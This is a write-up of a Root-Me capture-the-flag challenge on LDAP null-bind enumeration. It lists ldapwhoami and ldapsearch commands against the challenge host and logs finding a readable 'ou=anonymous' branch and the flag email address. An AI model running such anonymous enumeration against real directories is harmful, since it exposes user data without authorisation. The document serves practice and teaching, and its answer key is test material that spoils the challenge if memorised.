2.1 KiB
2.1 KiB
LDAP - null bind
Notes
Task
Aufgabe
Es scheint, dass einer der Anonymen einen neuen Zweig im LDAP-Verzeichnis erstellt hat, irgendwo in : dc=challenge01,dc=root-me,dc=org
Verschaffen Sie sich Zugang zu seinen Daten und erhalten Sie seine E-Mail-Adresse. Zugangsdaten für die Übung Host challenge01.root-me.org Protokoll TCP Port 54013
Findings
- Challenge type: LDAP anonymous/null bind enumeration.
- Base DN: dc=challenge01,dc=root-me,dc=org
- Target: find the branch created by an anonymous user and extract their email address.
Useful tools
- ldapsearch (required)
- ldapwhoami (quick null-bind check)
- openssl s_client (optional, for TLS troubleshooting)
Recon commands
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(mail=*)"Execution log
-
Verified anonymous bind:
ldapwhoami -x -H ldap://challenge01.root-me.org:54013 # anonymous -
Direct subtree query on base DN is blocked:
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)" # result: 50 Insufficient access -
Enumerated likely child DNs and found readable branch:
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn # dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org -
Dumped subtree under readable branch:
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)" # dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org # mail: sabu@anonops.org
Flag / answer
- Email address: sabu@anonops.org